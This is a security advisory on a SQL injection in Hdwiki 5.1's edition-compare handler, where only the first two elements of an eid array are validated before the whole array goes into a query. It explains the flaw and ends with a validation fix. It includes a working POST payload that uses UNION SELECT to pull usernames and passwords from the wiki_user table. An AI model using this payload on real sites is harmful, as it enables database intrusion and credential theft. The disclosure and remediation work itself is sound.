Hdwiki5.1 SQL Injection Vulnerability
Author: phithon

/control/edition.php, line 119, function docompare():

```php
function docompare() {
    if (!empty($this->setting['check_useragent'])) {
        $this->load('anticopy');
        if (!$_ENV['anticopy']->check_useragent()) {
            $this->message('access prohibited', '', 0);
        }
    }
    if (!empty($this->setting['check_visitrate'])) {
        $this->load('anticopy');
        $_ENV['anticopy']->check_visitrate();
    }
    if ($this->get[4] == 'box') {
        @header('content-type: text/html; charset=' . WIKI_CHARSET);
        if (!@is_numeric($this->get[2]) || !@is_numeric($this->get[3])) {
            $this->message($this->view->lang['parametererror'], 'index.php', 0);
        }
        $did = $this->get[2];
        $eid = $this->get[3];
        $edition = array();
        $editions = $_ENV['doc']->get_edition_list($did, "'time','authorid','author','word','images','content'", $eid);
        $this->view->assign('version', $editions);
        $this->view->display('comparebox');
        exit;
    }
    if (@!is_numeric($this->post['eid'][0]) || @!is_numeric($this->post['eid'][1])) {
        $this->message($this->view->lang['parametererror'], 'index.php', 0);
    }
    $edition = $_ENV['doc']->get_edition($this->post['eid']);
    if ($edition[0]['did'] != $edition[1]['did']) {
        $this->message($this->view->lang['parametererror'], 'index.php', 0);
    }
```

Pay attention to this statement:

```php
    if (@!is_numeric($this->post['eid'][0]) || @!is_numeric($this->post['eid'][1])) {
        $this->message($this->view->lang['parametererror'], 'index.php', 0);
    }
```

It checks $this->post['eid'][0] and $this->post['eid'][1]; if either is not a number, an error is returned. Then $this->post['eid'] is passed as a whole to the get_edition function. Let's look at it:

```php
function get_edition($eid) {
    $editionlist = array();
    if (is_numeric($eid)) {
        $edition = $this->db->fetch_first("SELECT * FROM " . DB_TABLEPRE . "edition WHERE eid=$eid");
        if ($edition) {
            $edition['comtime'] = $edition['time'];
            $edition['time'] = $this->base->date($edition['time']);
            $edition['rawtitle'] = $edition['title'];
            $edition['title'] = htmlspecialchars($edition['title']);
            if (!$edition['content']) {
                $edition['content'] = file::readfromfile($this->get_edition_fileinfo($edition['eid'], 'file'));
            }
        }
        return $edition;
    } else {
        $eid = implode(",", $eid);
        $query = $this->db->query("SELECT * FROM " . DB_TABLEPRE . "edition WHERE eid IN ($eid)");
        while ($edition = $this->db->fetch_array($query)) {
            $edition['time'] = $this->base->date($edition['time']);
            $edition['rawtitle'] = $edition['title'];
            $edition['title'] = htmlspecialchars($edition['title']);
            if (!$edition['content']) {
                $edition['content'] = file::readfromfile($this->get_edition_fileinfo($edition['eid'], 'file'));
            }
            $editionlist[] = $edition;
        }
        return $editionlist;
    }
}
```
Note the following two statements:

```php
$eid = implode(",", $eid);
$query = $this->db->query("SELECT * FROM " . DB_TABLEPRE . "edition WHERE eid IN ($eid)");
```

Here the whole $eid array is joined with implode and dropped straight into the SQL statement. Checking only whether [0] and [1] are numeric is therefore not enough: element [2] is never checked, which results in injection.

Local test:

Send the following POST data to http://localhost/hdwiki/index.php?edition-compare-1

eid[0]=2&eid[1]=19&eid[2]=-3) UNION SELECT 1,2,35,4,5,6,7,8,9,10,user(),username,password,14,15,16,17,18,19 from wiki_user%23

(The values must be adjusted to the actual situation; otherwise a parameter error is displayed. For details, see the code. The PoC assumes a default installation.)
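As an added example (not Hdwiki's own code), the following shows the fix a maintainer would apply: validate every element of the eid array, not just the first two, before it can reach implode(). The helper names sanitize_eid_list() and build_edition_query() and the DB_TABLEPRE value are assumptions for this example.

```php
<?php
// Hypothetical: Hdwiki defines DB_TABLEPRE in its config; 'wiki_' matches the
// default prefix seen in the advisory's payload (wiki_user).
define('DB_TABLEPRE', 'wiki_');

// Return a list of ints if EVERY element is a non-negative integer string,
// or null if any element is missing, non-scalar or not purely digits.
// The vulnerable code only applied is_numeric() to [0] and [1]; this loop
// covers the whole array, so a third element carrying SQL is rejected.
function sanitize_eid_list($eids): ?array {
    if (!is_array($eids) || count($eids) < 2) {
        return null;
    }
    $clean = array();
    foreach ($eids as $eid) {
        if (!is_int($eid) && !is_string($eid)) {
            return null;
        }
        // ctype_digit is stricter than is_numeric: it refuses signs, spaces,
        // exponents and anything after the digits, e.g. "-3) UNION SELECT".
        if (!ctype_digit((string)$eid)) {
            return null;
        }
        $clean[] = (int)$eid;
    }
    return $clean;
}

// Build the IN (...) clause only from values sanitize_eid_list() produced,
// so request data can no longer change the shape of the statement.
function build_edition_query(array $clean_eids): string {
    return "SELECT * FROM " . DB_TABLEPRE . "edition WHERE eid IN ("
        . implode(',', $clean_eids) . ")";
}

// Constructed inputs mirroring the advisory: a benign compare request and
// the same request with a third element containing SQL.
$benign = array('2', '19');
$hostile = array('2', '19', '-3) UNION SELECT 1,2,3 from wiki_user#');

$ok = sanitize_eid_list($benign);
echo $ok === null ? "benign: rejected\n" : build_edition_query($ok) . "\n";

$bad = sanitize_eid_list($hostile);
echo $bad === null ? "hostile: rejected, parameter error returned\n"
                   : build_edition_query($bad) . "\n";
```

In the controller, a null result from the validator should short-circuit to the existing parametererror message, exactly as the [0]/[1] check already does.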